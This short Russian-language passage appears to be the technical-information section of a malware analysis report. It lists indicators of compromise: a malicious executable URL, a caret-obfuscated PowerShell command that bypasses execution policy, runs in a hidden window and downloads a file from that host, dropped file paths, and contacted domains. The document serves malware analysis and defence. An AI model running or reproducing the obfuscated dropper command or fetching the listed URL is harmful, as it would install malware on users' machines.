Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^Owe^r^ShEll^.e^X^e -EXEc^Ut^IoNpO^l^iCY^ byP^a^ss ^-NOpRO^f^IL^E^ ^-^WINDowSTYLE^ ^hi^D^dEn (^n^Ew-^oBJEC^T Sy^ST^E^M.N^Et.w^E^BCLi^e^nt^).^DownL^oA^D^fIl^E^(^'http://nexco...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /C "p^Owe^r^ShEll^.e^X^e -EXEc^Ut^IoNpO^l^iCY^ byP^a^ss ^-NOpRO^f^IL^E^ ^-^WINDowSTYLE^ ^hi^D^dEn (^n^Ew-^oBJEC^T Sy^ST^E^M.N^Et.w^E^BCLi^e^nt^).^DownL^oA^D^fIl^E^(^'http://nexco...' (со скрытым окном)